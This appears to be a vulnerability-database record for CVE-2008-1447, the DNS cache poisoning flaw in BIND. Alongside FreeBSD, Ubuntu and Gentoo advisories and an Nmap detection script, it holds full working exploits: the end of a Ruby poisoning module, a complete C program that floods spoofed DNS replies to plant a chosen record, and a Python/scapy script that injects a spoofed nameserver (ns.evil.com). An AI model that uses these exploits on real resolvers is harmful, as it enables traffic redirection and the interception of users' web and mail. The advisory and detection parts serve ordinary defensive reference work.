\nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nprint_status(\"Poisoning successful after #{queries} attempts: #{name} == #{address}\") \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68471/bailiwicked_host.rb.txt"}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nProblem Description:\nThe BIND DNS implementation does not randomize the UDP source\n\t port when doing remote queries, and the query id alone does\n\t not provide adequate randomization.\nImpact:\nThe lack of source port randomization reduces the amount of\n\t data the attacker needs to guess in order to successfully\n\t execute a DNS cache poisoning attack. This allows the\n\t attacker to influence or control the results of DNS queries\n\t being returned to users from target systems.\nWorkaround:\nLimiting the group of machines that can do recursive queries\n\t on the DNS server will make it more difficult, but not\n\t impossible, for this vulnerability to be exploited.\nTo limit the machines able to perform recursive queries, add an ACL in\n\t named.conf and limit recursion like the following:\nacl example-acl {\n 192.0.2.0/24;\n};\noptions {\n\trecursion yes;\n\tallow-recursion { example-acl; };\n};\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-07-08T00:00:00", "id": "655EE1EC-511B-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/655ee1ec-511b-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- DNS cache poisoning", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2020-07-09T00:23:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dan Kaminsky discovered weaknesses in the DNS protocol as implemented \nby Bind. A remote attacker could exploit this to spoof DNS entries and \npoison DNS caches. Among other things, this could lead to misdirected \nemail and web traffic.", "edition": 5, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "USN-622-1", "href": "https://ubuntu.com/security/notices/USN-622-1", "title": "Bind vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:16", "description": "Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying txidtest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/txidtest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the txidtest server. In addition your IP address will be sent along with the txidtest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-txid <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 3, "published": "2008-11-06T02:52:59", "title": "dns-random-txid NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-TXID.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-txid.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-TXID DNS recursion\nvulnerability. Predictable TXID values can make a DNS server vulnerable to\ncache poisoning attacks (see CVE-2008-1447).\n\nThe script works by querying txidtest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/txidtest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the txidtest\nserver. In addition your IP address will be sent along with the\ntxidtest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\nauthor = [[\nScript: Brandon Enright <bmenrigh@ucsd.edu>\ntxidtest.dns-oarc.net: Duane Wessels <wessels@dns-oarc.net>\n]]\n\n---\n-- @usage\n-- nmap -sU -p 53 --script=dns-random-txid <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 53/udp open domain udp-response\n-- |_dns-random-txid: X.X.X.X is GREAT: 27 queries in 61.5 seconds from 27 txids with std dev 20509\n\n-- This script uses (with permission) Duane Wessels' txidtest.dns-oarc.net\n-- service. Duane/OARC believe the service is valuable to the community\n-- and have no plans to ever turn the service off.\n-- The likely long-term availability makes this script a good candidate\n-- for inclusion in Nmap proper.\n\ncategories = {\"external\", \"intrusive\"}\n\n\nportrule = shortport.portnumber(53, \"udp\")\n\nlocal function fail (err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n -- TXID: 0xbabe\n -- Flags: 0x0100\n -- Questions: 1\n -- Answer RRs: 0\n -- Authority RRs: 0\n -- Additional RRs: 0\n\n -- Query:\n -- Name: txidtest, dns-oarc, net\n -- Type: TXT (0x0010)\n -- Class: IN (0x0001)\n\n local query = string.char( 0xba, 0xbe, -- TXID\n 0x01, 0x00, -- Flags\n 0x00, 0x01, -- Questions\n 0x00, 0x00, -- Answer RRs\n 0x00, 0x00, -- Authority RRs\n 0x00, 0x00, -- Additional RRs\n 0x08) .. \"txidtest\" ..\n \"\\x08\" .. \"dns-oarc\" ..\n \"\\x03\" .. \"net\" ..\n string.char( 0x00, -- Name terminator\n 0x00, 0x10, -- Type (TXT)\n 0x00, 0x01) -- Class (IN)\n\n local status, result = comm.exchange(host, port, query, {proto=\"udp\",\n timeout=20000})\n\n -- Fail gracefully\n if not status then\n return fail(result)\n end\n\n -- Update the port\n nmap.set_port_state(host, port, \"open\")\n\n -- Now we need to \"parse\" the results to check to see if they are good\n\n -- We need a minimum of 5 bytes...\n if (#result < 5) then\n return fail(\"Malformed response\")\n end\n\n -- Check TXID\n if (string.byte(result, 1) ~= 0xba\n or string.byte(result, 2) ~= 0xbe) then\n return fail(\"Invalid Transaction ID\")\n end\n\n -- Check response flag and recursion\n if not ((string.byte(result, 3) & 0x80) == 0x80\n and (string.byte(result, 4) & 0x80) == 0x80) then\n return fail(\"Server refused recursion\")\n end\n\n -- Check error flag\n if (string.byte(result, 4) & 0x0F) ~= 0x00 then\n return fail(\"Server failure\")\n end\n\n -- Check for two Answer RRs and 1 Authority RR\n if (string.byte(result, 5) ~= 0x00\n or string.byte(result, 6) ~= 0x01\n or string.byte(result, 7) ~= 0x00\n or string.byte(result, 8) ~= 0x02) then\n return fail(\"Response did not include expected answers\")\n end\n\n -- We need a minimum of 128 bytes...\n if (#result < 128) then\n return fail(\"Truncated response\")\n end\n\n -- Here is the really fragile part. If the DNS response changes\n -- in any way, this won't work and will fail.\n -- Jump to second answer and check to see that it is TXT, IN\n -- then grab the length and display that text...\n\n -- Check for TXT\n if (string.byte(result, 118) ~= 0x00\n or string.byte(result, 119) ~= 0x10)\n then\n return fail(\"Answer record not of type TXT\")\n end\n\n -- Check for IN\n if (string.byte(result, 120) ~= 0x00\n or string.byte(result, 121) ~= 0x01) then\n return fail(\"Answer record not of type IN\")\n end\n\n -- Get TXT length\n local txtlen = string.byte(result, 128)\n\n -- We now need a minimum of 128 + txtlen bytes + 1...\n if (#result < 128 + txtlen) then\n return fail(\"Truncated response\")\n end\n\n -- GET TXT record\n local txtrd = string.sub(result, 129, 128 + txtlen)\n\n return txtrd\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning", "edition": 1, "published": "2008-07-25T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-25T00:00:00", "id": "EXPLOITPACK:C1465BB04B39525EA045A41E2DF2698D", "href": "", "sourceData": "/*\n * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack\n *\n * Compilation:\n * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm\n *\n * Dependency: libdnet (aka libdumbnet-dev under Ubuntu)\n *\n * Author: marc.bevand at rapid7 dot com\n */\n\n#define _BSD_SOURCE\n\n#include <sys/types.h>\n#include <err.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <math.h>\n#include <time.h>\n#include <unistd.h>\n#include <dumbnet.h>\n\n#define DNSF_RESPONSE (1<<15)\n#define DNSF_AUTHORITATIVE (1<<10)\n#define DNSF_REC_DESIRED (1<<8)\n#define DNSF_REC_AVAILABLE (1<<7)\n\n#define TYPE_A 0x1\n#define TYPE_NS 0x2\n#define CLASS_IN 0x1\n\nstruct dns_pkt\n{\n uint16_t txid;\n uint16_t flags;\n uint16_t nr_quest;\n uint16_t nr_ans;\n uint16_t nr_auth;\n uint16_t nr_add;\n} __attribute__ ((__packed__));\n\nvoid format_domain(u_char *buf, unsigned size, unsigned *len, const char *name)\n{\n unsigned bufi, i, j;\n bufi = i = j = 0;\n while (name[i])\n {\n if (name[i] == '.')\n {\n if (bufi + 1 + (i - j) > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = i - j;\n memcpy(buf + bufi, name + j, i - j);\n bufi += i - j;\n j = i + 1;\n }\n i++;\n }\n if (bufi + 1 + 2 + 2 > size)\n fprintf(stderr, \"format_domain overflow\\n\"), exit(1);\n buf[bufi++] = 0;\n *len = bufi;\n}\n\nvoid format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class)\n{\n uint16_t tmp;\n // name\n format_domain(buf, size, len, name);\n // type\n tmp = htons(type);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n // class\n tmp = htons(class);\n memcpy(buf + *len, &tmp, sizeof (tmp));\n *len += sizeof (tmp);\n}\n\nvoid format_rr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t class, uint32_t ttl, const char *data)\n{\n format_qr(buf, size, len, name, type, class);\n // ttl\n ttl = htonl(ttl);\n memcpy(buf + *len, &ttl, sizeof (ttl));\n *len += sizeof (ttl);\n // data length + data\n uint16_t dlen;\n struct addr addr;\n switch (type)\n {\n case TYPE_A:\n dlen = sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n dlen = strlen(data) + 1;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n dlen = htons(dlen);\n memcpy(buf + *len, &dlen, sizeof (dlen));\n *len += sizeof (dlen);\n // data\n unsigned len2;\n switch (type)\n {\n case TYPE_A:\n if (addr_aton(data, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", data), exit(1);\n memcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip));\n *len += sizeof (addr.addr_ip);\n break;\n case TYPE_NS:\n format_domain(buf + *len, size - *len, &len2, data);\n *len += len2;\n break;\n default:\n fprintf(stderr, \"format_rr: unknown type %02x\", type);\n exit(1);\n }\n}\n\nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name)\n{\n u_char *out = buf;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(0),\n .nr_auth = htons(0),\n .nr_add = htons(0),\n };\n u_char qr[256];\n unsigned l;\n format_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN);\n if (sizeof (p) + l > size)\n fprintf(stderr, \"dns_query overflow\"), exit(1);\n memcpy(out, &p, sizeof (p));\n out += sizeof (p);\n memcpy(out, qr, l);\n out += l;\n *len = sizeof (p) + l;\n}\n\nvoid dns_response(u_char *buf, unsigned size, unsigned *len,\n uint16_t txid, uint16_t flags,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n u_char *out = buf;\n u_char *end = buf + size;\n u_char rec[256];\n unsigned l_rec;\n uint32_t ttl = 24*3600;\n struct dns_pkt p = {\n .txid = htons(txid),\n .flags = htons(flags),\n .nr_quest = htons(1),\n .nr_ans = htons(1),\n .nr_auth = htons(1),\n .nr_add = htons(1),\n };\n (void)domain;\n *len = 0;\n if (out + *len + sizeof (p) > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, &p, sizeof (p)); *len += sizeof (p);\n // queries\n format_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // answers\n format_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN,\n ttl, q_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // authoritative nameservers\n format_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN,\n ttl, auth_name);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n // additional records\n format_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN,\n ttl, auth_ip);\n if (out + *len + l_rec > end)\n fprintf(stderr, \"dns_response overflow\"), exit(1);\n memcpy(out + *len, rec, l_rec); *len += l_rec;\n}\n\nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(1234);\n udp->uh_dport = htons(53);\n // dns\n dns_query(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n rand(), DNSF_REC_DESIRED, name);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nunsigned build_response(u_char *buf, const char *srcip, const char *dstip,\n uint16_t port_resolver, uint16_t txid,\n const char *q_name, const char *q_ip,\n const char *domain, const char *auth_name, const char *auth_ip)\n{\n unsigned len = 0;\n // ip\n struct ip_hdr *ip = (struct ip_hdr *)buf;\n ip->ip_hl = 5;\n ip->ip_v = 4;\n ip->ip_tos = 0;\n ip->ip_id = rand() & 0xffff;\n ip->ip_off = 0;\n ip->ip_ttl = IP_TTL_MAX;\n ip->ip_p = 17; // udp\n ip->ip_sum = 0;\n struct addr addr;\n if (addr_aton(srcip, &addr) < 0)\n fprintf(stderr, \"invalid source IP: %s\", srcip), exit(1);\n ip->ip_src = addr.addr_ip;\n if (addr_aton(dstip, &addr) < 0)\n fprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1);\n ip->ip_dst = addr.addr_ip;\n // udp\n struct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN);\n udp->uh_sport = htons(53);\n udp->uh_dport = htons(port_resolver);\n // dns\n dns_response(buf + IP_HDR_LEN + UDP_HDR_LEN,\n (unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len,\n txid, DNSF_RESPONSE | DNSF_AUTHORITATIVE,\n q_name, q_ip, domain, auth_name, auth_ip);\n // udp len\n len += UDP_HDR_LEN;\n udp->uh_ulen = htons(len);\n // ip len & cksum\n len += IP_HDR_LEN;\n ip->ip_len = htons(len);\n ip_checksum(buf, len);\n return len;\n}\n\nvoid usage(char *name)\n{\n fprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \"\n \"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\"\n \" <ip-querier> Source IP used when sending queries for random hostnames\\n\"\n \" (typically your IP)\\n\"\n \" <ip-resolver> Target DNS resolver to attack\\n\"\n \" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\"\n \" <port-resolver> Source port used by the resolver when forwarding queries\\n\"\n \" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\"\n \" <domain> Domain name, see <subhost>.\\n\"\n \" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\"\n \" <attempts> Number of poisoning attemps, more attempts increase the\\n\"\n \" chance of successful poisoning, but also the attack time\\n\"\n \" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\"\n \" increase the chance of successful poisoning but, but also\\n\"\n \" the rate of packet loss\\n\"\n \"Example:\\n\"\n \" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\"\n \"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\"\n \"in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n\"\n \"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\"\n \"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\"\n \"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\"\n \"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\"\n \"100 attempts/sec).\\n\",\n name, name);\n}\n\nint main(int argc, char **argv)\n{\n if (argc != 10)\n usage(argv[0]), exit(1);\n const char *querier = argv[1];\n const char *ip_resolver = argv[2];\n const char *ip_authoritative = argv[3];\n uint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0);\n const char *subhost = argv[5];\n const char *domain = argv[6];\n const char *anyip = argv[7];\n uint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0);\n uint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0);\n if (domain[strlen(domain) - 1 ] != '.')\n fprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1);\n printf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts));\n srand(time(NULL));\n int unique = rand() + (rand() << 16);\n u_char buf[IP_LEN_MAX];\n unsigned len;\n char name[256];\n char ns[256];\n ip_t *iph;\n if ((iph = ip_open()) == NULL)\n err(1, \"ip_open\");\n int cnt = 0;\n while (cnt < attempts)\n {\n // send a query for a random hostname\n snprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain);\n len = build_query(buf, querier, ip_resolver, name);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n // give the resolver enough time to forward the query and be in a state\n // where it waits for answers; sleeping 10ms here limits the number of\n // attempts to 100 per sec\n usleep(10000);\n // send spoofed replies, each reply contains:\n // - 1 query: query for the \"random hostname\"\n // - 1 answer: \"random hostname\" A 1.1.1.1\n // - 1 authoritative nameserver: <domain> NS <subhost>.<domain>\n // - 1 additional record: <subhost>.<domain> A <any-ip>\n snprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain);\n unsigned r;\n for (r = 0; r < replies; r++)\n {\n // use a txid that is just 'r': 0..(replies-1)\n len = build_response(buf, ip_authoritative, ip_resolver,\n port_resolver, r, name, \"1.1.1.1\", domain, ns, anyip);\n if (ip_send(iph, buf, len) != len)\n err(1, \"ip_send\");\n }\n cnt++;\n }\n ip_close(iph);\n return 0;\n}\n\n// milw0rm.com [2008-07-25]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-04-01T19:04:05", "description": "\nBIND 9.x - Remote DNS Cache Poisoning (Python)", "edition": 1, "published": "2008-07-24T00:00:00", "title": "BIND 9.x - Remote DNS Cache Poisoning (Python)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "EXPLOITPACK:E8D42B80BBE9C0425198AC7565168EDF", "href": "", "sourceData": "from scapy import *\nimport random\n\n# Copyright (C) 2008 Julien Desfossez <ju@klipix.org>\n# http://www.solisproject.net/\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n\n# This script exploit the flaw discovered by Dan Kaminsky\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n# http://www.kb.cert.org/vuls/id/800113\n\n# It tries to insert a dummy record in the vulnerable DNS server by guessing\n# the transaction ID.\n# It also insert Authority record for a valid record of the target domain.\n\n# To use this script, you have to discover the source port used by the vulnerable\n# DNS server.\n# Python is really slow, so it will take some time, but it works :-)\n\n\n# IP to insert for our dummy record\ntargetip = \"X.X.X.X\"\n# Vulnerable recursive DNS server\ntargetdns = \"X.X.X.X\"\n# Authoritative NS for the target domain\nsrcdns = [\"X.X.X.X\"]\n\n# Domain to play with\ndummydomain = \"\"\nbasedomain = \".example.com.\"\n# sub-domain to claim authority on\ndomain = \"sub.example.com.\"\n# Spoofed authoritative DNS for the sub-domain\nspoof=\"ns.evil.com.\"\n# src port of vulnerable DNS for recursive queries\ndnsport = 32883\n\n# base packet\nrep = IP(dst=targetdns, src=srcdns[0])/ \\\n\tUDP(sport=53, dport=dnsport)/ \\\n\tDNS(id=99, qr=1, rd=1, ra=1, qdcount=1, ancount=1, nscount=1, arcount=0, \n\t\tqd=DNSQR(qname=dummydomain, qtype=1, qclass=1), \n\t\tan=DNSRR(rrname=dummydomain, ttl=70000, rdata=targetip, rdlen=4),\n\t\tns=DNSRR(rrname=domain, rclass=1, ttl=70000, rdata=spoof, rdlen=len(spoof)+1, type=2)\n\t)\n\n\ncurrentid = 1024\ndummyid = 3\nwhile 1:\n\tdummydomain = \"a\" + str(dummyid) + basedomain\n\tdummyid = dummyid + 1\n\t# request for our dummydomain\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tsend(req)\n\n\t# build the response\n\trep.getlayer(DNS).qd.qname = dummydomain\n\trep.getlayer(DNS).an.rrname = dummydomain\n\n\tfor i in range(50):\n\t\t# TXID\n\t\trep.getlayer(DNS).id = currentid\n\t\tcurrentid = currentid + 1\n\t\tif currentid == 65536:\n\t\t\tcurrentid = 1024\n\n\t\t# len and chksum\n\t\trep.getlayer(UDP).len = IP(str(rep)).len-20\n\t\trep[UDP].post_build(str(rep[UDP]), str(rep[UDP].payload))\n\n\t\tprint \"Sending our reply from %s with TXID = %s for %s\" % (srcdns[0], str(rep.getlayer(DNS).id), dummydomain)\n\t\tsend(rep, verbose=0)\n\n\t# check to see if it worked\n\treq = IP(dst=targetdns)/ \\\n\t UDP(sport=random.randint(1025, 65000), dport=53)/ \\\n\t DNS(id=99, opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,\n\t\t\t qd=DNSQR(qname=dummydomain, qtype=1, qclass=1),\n\t\t\t an=0,\n\t\t\t ns=0,\n\t\t\t ar=0\n\t\t)\n\tz = sr1(req, timeout=2, retry=0, verbose=0)\n\ttry:\n\t\tif z[DNS].an.rdata == targetip:\n\t\t\tprint \"Successfully poisonned our target with a dummy record !!\"\n\t\t\tbreak\n\texcept:\n\t\tprint \"Poisonning failed\"\n\n# milw0rm.com [2008-07-24]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "### Background\n\nISC BIND is the Internet Systems Consortium implementation of the Domain Name System (DNS) protocol. \n\n### Description\n\nDan Kaminsky of IOActive has reported a weakness in the DNS protocol related to insufficient randomness of DNS transaction IDs and query source ports. \n\n### Impact\n\nAn attacker could exploit this weakness to poison the cache of a recursive resolver and thus spoof DNS traffic, which could e.g. lead to the redirection of web or mail traffic to malicious sites. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll BIND users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.4.2_p1\"\n\nNote: In order to utilize the query port randomization to mitigate the weakness, you need to make sure that your network setup allows the DNS server to use random source ports for query and that you have not set a fixed query port via the \"query-source port\" directive in the BIND configuration.", "edition": 1, "modified": "2008-07-11T00:00:00", "published": "2008-07-11T00:00:00", "id": "GLSA-200807-08", "href": "https://security.gentoo.org/glsa/200807-08", "type": "gentoo", "title": "BIND: Cache poisoning", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}